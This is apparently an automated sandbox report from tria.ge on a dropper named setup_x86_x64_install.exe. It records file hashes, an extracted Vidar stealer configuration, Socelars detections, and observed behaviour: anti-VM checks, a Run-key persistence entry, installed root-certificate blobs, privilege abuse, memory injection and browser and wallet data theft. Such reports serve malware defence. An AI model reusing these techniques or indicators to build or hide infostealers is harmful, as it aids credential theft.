Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Overview
overview
10Static
static
setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows7_x64
10setup_x86_...ll.exe
windows11_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10setup_x86_...ll.exe
windows10_x64
10Resubmissions
08/10/2021, 15:07
211008-shl8xsefa9 1008/10/2021, 05:38
211008-gbvqyadce8 1007/10/2021, 18:28
211007-w4jayacge3 10Analysis
-
max time kernel
1805s -
max time network
1835s -
platform
windows7_x64 -
resource
win7v20210408 -
submitted
08/10/2021, 15:07
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-ja-20210920
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win7v20210408
Behavioral task
behavioral3
Sample
setup_x86_x64_install.exe
Resource
win7-de-20210920
Behavioral task
behavioral4
Sample
setup_x86_x64_install.exe
Resource
win11
Behavioral task
behavioral5
Sample
setup_x86_x64_install.exe
Resource
win10v20210408
Behavioral task
behavioral6
Sample
setup_x86_x64_install.exe
Resource
win10-ja-20210920
Behavioral task
behavioral7
Sample
setup_x86_x64_install.exe
Resource
win10-en-20210920
Behavioral task
behavioral8
Sample
setup_x86_x64_install.exe
Resource
win10-de-20210920
General
-
Target
setup_x86_x64_install.exe
-
Size
5.9MB
-
MD5
0308d3044eda0db671c58c2a97cb3c10
-
SHA1
1737ab616a61d35b0bde0aaad949d9894e14be9e
-
SHA256
b52242da50ea2b3a05f6787dfa7197a0c99442e91d3bc78b71363c2ff3c4f072
-
SHA512
29902fe4a53319290d18b65a6baa1d747f1389a84cd7eb1a123d05b418b737336cd54c84b76403bc2cbb1f078c19b4461a89eec8214bfcdcf4831bb1dbda0e3e
Malware Config
Extracted
vidar
41.2
916
https://mas.to/@serg4325
-
profile_id
916
Signatures
-
Socelars Payload 5 IoCs
resource yara_rule behavioral2/files/0x00030000000130db-116.dat family_socelars behavioral2/files/0x00030000000130db-183.dat family_socelars behavioral2/files/0x00030000000130db-185.dat family_socelars behavioral2/files/0x00030000000130db-187.dat family_socelars behavioral2/files/0x00030000000130db-188.dat family_socelars -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 1 IoCs
resource yara_rule behavioral2/memory/1536-194-0x0000000000400000-0x0000000002E08000-memory.dmp family_vidar -
resource yara_rule behavioral2/files/0x00030000000130d0-76.dat aspack_v212_v242 behavioral2/files/0x00030000000130d0-77.dat aspack_v212_v242 behavioral2/files/0x00030000000130cf-78.dat aspack_v212_v242 behavioral2/files/0x00030000000130cf-79.dat aspack_v212_v242 behavioral2/files/0x00030000000130d2-82.dat aspack_v212_v242 behavioral2/files/0x00030000000130d2-83.dat aspack_v212_v242 -
Downloads MZ/PE file
-
Executes dropped EXE 19 IoCs
pid Process 1920 setup_installer.exe 1716 setup_install.exe 1240 Thu16205451b994.exe 1292 Thu166f9a8bbe80.exe 1536 Thu1628aafb3efd7c3d.exe 2004 Thu161580bf75.exe 1492 Thu164ba03be19.exe 464 Thu167d514d2a7ac5a.exe 1712 Thu16f584bd3686.exe 340 Thu165bd34b1e1d4d81.exe 1604 8982011.scr 1756 4731061.scr 1796 8114232.scr 2144 6854159.scr 2208 3674430.scr 2320 WinHoster.exe 2532 rax9AAxU1FbeVTLaejxkPI3X.exe 2900 Thu1653d94a8da.exe 2336 09xU.exE -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 8114232.scr Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 8114232.scr -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Control Panel\International\Geo\Nation Thu166f9a8bbe80.exe -
Loads dropped DLL 61 IoCs
pid Process 1960 setup_x86_x64_install.exe 1920 setup_installer.exe 1920 setup_installer.exe 1920 setup_installer.exe 1920 setup_installer.exe 1920 setup_installer.exe 1920 setup_installer.exe 1716 setup_install.exe 1716 setup_install.exe 1716 setup_install.exe 1716 setup_install.exe 1716 setup_install.exe 1716 setup_install.exe 1716 setup_install.exe 1716 setup_install.exe 856 cmd.exe 316 cmd.exe 316 cmd.exe 1380 cmd.exe 1380 cmd.exe 1744 cmd.exe 864 cmd.exe 864 cmd.exe 1240 Thu16205451b994.exe 1240 Thu16205451b994.exe 1292 Thu166f9a8bbe80.exe 1292 Thu166f9a8bbe80.exe 1536 Thu1628aafb3efd7c3d.exe 1536 Thu1628aafb3efd7c3d.exe 1568 cmd.exe 464 Thu167d514d2a7ac5a.exe 464 Thu167d514d2a7ac5a.exe 1672 cmd.exe 620 cmd.exe 340 Thu165bd34b1e1d4d81.exe 340 Thu165bd34b1e1d4d81.exe 1756 4731061.scr 2320 WinHoster.exe 2320 WinHoster.exe 1292 Thu166f9a8bbe80.exe 2776 WerFault.exe 2776 WerFault.exe 2776 WerFault.exe 2776 WerFault.exe 1948 cmd.exe 2900 Thu1653d94a8da.exe 2900 Thu1653d94a8da.exe 2088 WerFault.exe 2088 WerFault.exe 2088 WerFault.exe 2776 WerFault.exe 2088 WerFault.exe 2316 cmd.exe 2336 09xU.exE 2336 09xU.exE 2084 rundll32.exe 2084 rundll32.exe 2084 rundll32.exe 1468 rundll32.exe 1468 rundll32.exe 1468 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral2/memory/1796-220-0x0000000000130000-0x0000000000131000-memory.dmp themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" 4731061.scr -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 8114232.scr -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 18 ip-api.com 41 ipinfo.io 42 ipinfo.io -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 1796 8114232.scr -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 2 IoCs
pid pid_target Process procid_target 2776 1292 WerFault.exe 41 2088 1536 WerFault.exe 43 -
Kills process with taskkill 3 IoCs
pid Process 316 taskkill.exe 2604 taskkill.exe 1500 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 Thu167d514d2a7ac5a.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 Thu167d514d2a7ac5a.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 Thu161580bf75.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e Thu161580bf75.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C Thu167d514d2a7ac5a.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b060105050802025300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c00b000000010000001600000047006c006f00620061006c005300690067006e000000140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b1d00000001000000100000006ee7f3b060d10e90a31ba3471b999236030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0 Thu167d514d2a7ac5a.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 190000000100000010000000a823b4a20180beb460cab955c24d7e21030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c1d00000001000000100000006ee7f3b060d10e90a31ba3471b999236140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b0b000000010000001600000047006c006f00620061006c005300690067006e0000005300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b060105050802020f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0 Thu167d514d2a7ac5a.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1796 8114232.scr 1604 8982011.scr 692 powershell.exe 1292 Thu166f9a8bbe80.exe 1292 Thu166f9a8bbe80.exe 1292 Thu166f9a8bbe80.exe 1292 Thu166f9a8bbe80.exe 1292 Thu166f9a8bbe80.exe 1292 Thu166f9a8bbe80.exe 1292 Thu166f9a8bbe80.exe 1292 Thu166f9a8bbe80.exe 1292 Thu166f9a8bbe80.exe 1292 Thu166f9a8bbe80.exe 1292 Thu166f9a8bbe80.exe 1292 Thu166f9a8bbe80.exe 1292 Thu166f9a8bbe80.exe 1292 Thu166f9a8bbe80.exe 1292 Thu166f9a8bbe80.exe 1292 Thu166f9a8bbe80.exe 1292 Thu166f9a8bbe80.exe 1292 Thu166f9a8bbe80.exe 1292 Thu166f9a8bbe80.exe 1292 Thu166f9a8bbe80.exe 1292 Thu166f9a8bbe80.exe 2532 rax9AAxU1FbeVTLaejxkPI3X.exe 2532 rax9AAxU1FbeVTLaejxkPI3X.exe 2532 rax9AAxU1FbeVTLaejxkPI3X.exe 2532 rax9AAxU1FbeVTLaejxkPI3X.exe 2532 rax9AAxU1FbeVTLaejxkPI3X.exe 2532 rax9AAxU1FbeVTLaejxkPI3X.exe 2532 rax9AAxU1FbeVTLaejxkPI3X.exe 2532 rax9AAxU1FbeVTLaejxkPI3X.exe 2532 rax9AAxU1FbeVTLaejxkPI3X.exe 2532 rax9AAxU1FbeVTLaejxkPI3X.exe 2532 rax9AAxU1FbeVTLaejxkPI3X.exe 2532 rax9AAxU1FbeVTLaejxkPI3X.exe 2532 rax9AAxU1FbeVTLaejxkPI3X.exe 2532 rax9AAxU1FbeVTLaejxkPI3X.exe 2532 rax9AAxU1FbeVTLaejxkPI3X.exe 2532 rax9AAxU1FbeVTLaejxkPI3X.exe 2532 rax9AAxU1FbeVTLaejxkPI3X.exe 2532 rax9AAxU1FbeVTLaejxkPI3X.exe 2532 rax9AAxU1FbeVTLaejxkPI3X.exe 2532 rax9AAxU1FbeVTLaejxkPI3X.exe 2532 rax9AAxU1FbeVTLaejxkPI3X.exe 2532 rax9AAxU1FbeVTLaejxkPI3X.exe 2532 rax9AAxU1FbeVTLaejxkPI3X.exe 2532 rax9AAxU1FbeVTLaejxkPI3X.exe 2532 rax9AAxU1FbeVTLaejxkPI3X.exe 2532 rax9AAxU1FbeVTLaejxkPI3X.exe 2532 rax9AAxU1FbeVTLaejxkPI3X.exe 2532 rax9AAxU1FbeVTLaejxkPI3X.exe 2532 rax9AAxU1FbeVTLaejxkPI3X.exe 2532 rax9AAxU1FbeVTLaejxkPI3X.exe 2532 rax9AAxU1FbeVTLaejxkPI3X.exe 2532 rax9AAxU1FbeVTLaejxkPI3X.exe 2532 rax9AAxU1FbeVTLaejxkPI3X.exe 2532 rax9AAxU1FbeVTLaejxkPI3X.exe 2532 rax9AAxU1FbeVTLaejxkPI3X.exe 2532 rax9AAxU1FbeVTLaejxkPI3X.exe 2532 rax9AAxU1FbeVTLaejxkPI3X.exe 2532 rax9AAxU1FbeVTLaejxkPI3X.exe 2532 rax9AAxU1FbeVTLaejxkPI3X.exe 2532 rax9AAxU1FbeVTLaejxkPI3X.exe -
Suspicious behavior: GetForegroundWindowSpam 3 IoCs
pid Process 2088 WerFault.exe 2776 WerFault.exe 2900 Thu1653d94a8da.exe -
Suspicious use of AdjustPrivilegeToken 44 IoCs
description pid Process Token: SeDebugPrivilege 2004 Thu161580bf75.exe Token: SeCreateTokenPrivilege 340 Thu165bd34b1e1d4d81.exe Token: SeAssignPrimaryTokenPrivilege 340 Thu165bd34b1e1d4d81.exe Token: SeLockMemoryPrivilege 340 Thu165bd34b1e1d4d81.exe Token: SeIncreaseQuotaPrivilege 340 Thu165bd34b1e1d4d81.exe Token: SeMachineAccountPrivilege 340 Thu165bd34b1e1d4d81.exe Token: SeTcbPrivilege 340 Thu165bd34b1e1d4d81.exe Token: SeSecurityPrivilege 340 Thu165bd34b1e1d4d81.exe Token: SeTakeOwnershipPrivilege 340 Thu165bd34b1e1d4d81.exe Token: SeLoadDriverPrivilege 340 Thu165bd34b1e1d4d81.exe Token: SeSystemProfilePrivilege 340 Thu165bd34b1e1d4d81.exe Token: SeSystemtimePrivilege 340 Thu165bd34b1e1d4d81.exe Token: SeProfSingleProcessPrivilege 340 Thu165bd34b1e1d4d81.exe Token: SeIncBasePriorityPrivilege 340 Thu165bd34b1e1d4d81.exe Token: SeCreatePagefilePrivilege 340 Thu165bd34b1e1d4d81.exe Token: SeCreatePermanentPrivilege 340 Thu165bd34b1e1d4d81.exe Token: SeBackupPrivilege 340 Thu165bd34b1e1d4d81.exe Token: SeRestorePrivilege 340 Thu165bd34b1e1d4d81.exe Token: SeShutdownPrivilege 340 Thu165bd34b1e1d4d81.exe Token: SeDebugPrivilege 340 Thu165bd34b1e1d4d81.exe Token: SeAuditPrivilege 340 Thu165bd34b1e1d4d81.exe Token: SeSystemEnvironmentPrivilege 340 Thu165bd34b1e1d4d81.exe Token: SeChangeNotifyPrivilege 340 Thu165bd34b1e1d4d81.exe Token: SeRemoteShutdownPrivilege 340 Thu165bd34b1e1d4d81.exe Token: SeUndockPrivilege 340 Thu165bd34b1e1d4d81.exe Token: SeSyncAgentPrivilege 340 Thu165bd34b1e1d4d81.exe Token: SeEnableDelegationPrivilege 340 Thu165bd34b1e1d4d81.exe Token: SeManageVolumePrivilege 340 Thu165bd34b1e1d4d81.exe Token: SeImpersonatePrivilege 340 Thu165bd34b1e1d4d81.exe Token: SeCreateGlobalPrivilege 340 Thu165bd34b1e1d4d81.exe Token: 31 340 Thu165bd34b1e1d4d81.exe Token: 32 340 Thu165bd34b1e1d4d81.exe Token: 33 340 Thu165bd34b1e1d4d81.exe Token: 34 340 Thu165bd34b1e1d4d81.exe Token: 35 340 Thu165bd34b1e1d4d81.exe Token: SeDebugPrivilege 1604 8982011.scr Token: SeDebugPrivilege 316 taskkill.exe Token: SeDebugPrivilege 692 powershell.exe Token: SeDebugPrivilege 2604 taskkill.exe Token: SeDebugPrivilege 2088 WerFault.exe Token: SeDebugPrivilege 2776 WerFault.exe Token: SeDebugPrivilege 1500 taskkill.exe Token: SeDebugPrivilege 1796 8114232.scr Token: SeDebugPrivilege 2208 3674430.scr -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1960 wrote to memory of 1920 1960 setup_x86_x64_install.exe 25 PID 1960 wrote to memory of 1920 1960 setup_x86_x64_install.exe 25 PID 1960 wrote to memory of 1920 1960 setup_x86_x64_install.exe 25 PID 1960 wrote to memory of 1920 1960 setup_x86_x64_install.exe 25 PID 1960 wrote to memory of 1920 1960 setup_x86_x64_install.exe 25 PID 1960 wrote to memory of 1920 1960 setup_x86_x64_install.exe 25 PID 1960 wrote to memory of 1920 1960 setup_x86_x64_install.exe 25 PID 1920 wrote to memory of 1716 1920 setup_installer.exe 26 PID 1920 wrote to memory of 1716 1920 setup_installer.exe 26 PID 1920 wrote to memory of 1716 1920 setup_installer.exe 26 PID 1920 wrote to memory of 1716 1920 setup_installer.exe 26 PID 1920 wrote to memory of 1716 1920 setup_installer.exe 26 PID 1920 wrote to memory of 1716 1920 setup_installer.exe 26 PID 1920 wrote to memory of 1716 1920 setup_installer.exe 26 PID 1716 wrote to memory of 1728 1716 setup_install.exe 29 PID 1716 wrote to memory of 1728 1716 setup_install.exe 29 PID 1716 wrote to memory of 1728 1716 setup_install.exe 29 PID 1716 wrote to memory of 1728 1716 setup_install.exe 29 PID 1716 wrote to memory of 1728 1716 setup_install.exe 29 PID 1716 wrote to memory of 1728 1716 setup_install.exe 29 PID 1716 wrote to memory of 1728 1716 setup_install.exe 29 PID 1716 wrote to memory of 856 1716 setup_install.exe 28 PID 1716 wrote to memory of 856 1716 setup_install.exe 28 PID 1716 wrote to memory of 856 1716 setup_install.exe 28 PID 1716 wrote to memory of 856 1716 setup_install.exe 28 PID 1716 wrote to memory of 856 1716 setup_install.exe 28 PID 1716 wrote to memory of 856 1716 setup_install.exe 28 PID 1716 wrote to memory of 856 1716 setup_install.exe 28 PID 1716 wrote to memory of 316 1716 setup_install.exe 30 PID 1716 wrote to memory of 316 1716 setup_install.exe 30 PID 1716 wrote to memory of 316 1716 setup_install.exe 30 PID 1716 wrote to memory of 316 1716 setup_install.exe 30 PID 1716 wrote to memory of 316 1716 setup_install.exe 30 PID 1716 wrote to memory of 316 1716 setup_install.exe 30 PID 1716 wrote to memory of 316 1716 setup_install.exe 30 PID 1716 wrote to memory of 1744 1716 setup_install.exe 31 PID 1716 wrote to memory of 1744 1716 setup_install.exe 31 PID 1716 wrote to memory of 1744 1716 setup_install.exe 31 PID 1716 wrote to memory of 1744 1716 setup_install.exe 31 PID 1716 wrote to memory of 1744 1716 setup_install.exe 31 PID 1716 wrote to memory of 1744 1716 setup_install.exe 31 PID 1716 wrote to memory of 1744 1716 setup_install.exe 31 PID 1716 wrote to memory of 1380 1716 setup_install.exe 33 PID 1716 wrote to memory of 1380 1716 setup_install.exe 33 PID 1716 wrote to memory of 1380 1716 setup_install.exe 33 PID 1716 wrote to memory of 1380 1716 setup_install.exe 33 PID 1716 wrote to memory of 1380 1716 setup_install.exe 33 PID 1716 wrote to memory of 1380 1716 setup_install.exe 33 PID 1716 wrote to memory of 1380 1716 setup_install.exe 33 PID 1716 wrote to memory of 620 1716 setup_install.exe 32 PID 1716 wrote to memory of 620 1716 setup_install.exe 32 PID 1716 wrote to memory of 620 1716 setup_install.exe 32 PID 1716 wrote to memory of 620 1716 setup_install.exe 32 PID 1716 wrote to memory of 620 1716 setup_install.exe 32 PID 1716 wrote to memory of 620 1716 setup_install.exe 32 PID 1716 wrote to memory of 620 1716 setup_install.exe 32 PID 1728 wrote to memory of 692 1728 cmd.exe 37 PID 1728 wrote to memory of 692 1728 cmd.exe 37 PID 1728 wrote to memory of 692 1728 cmd.exe 37 PID 1728 wrote to memory of 692 1728 cmd.exe 37 PID 1728 wrote to memory of 692 1728 cmd.exe 37 PID 1728 wrote to memory of 692 1728 cmd.exe 37 PID 1728 wrote to memory of 692 1728 cmd.exe 37 PID 1716 wrote to memory of 1576 1716 setup_install.exe 34
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1960 -
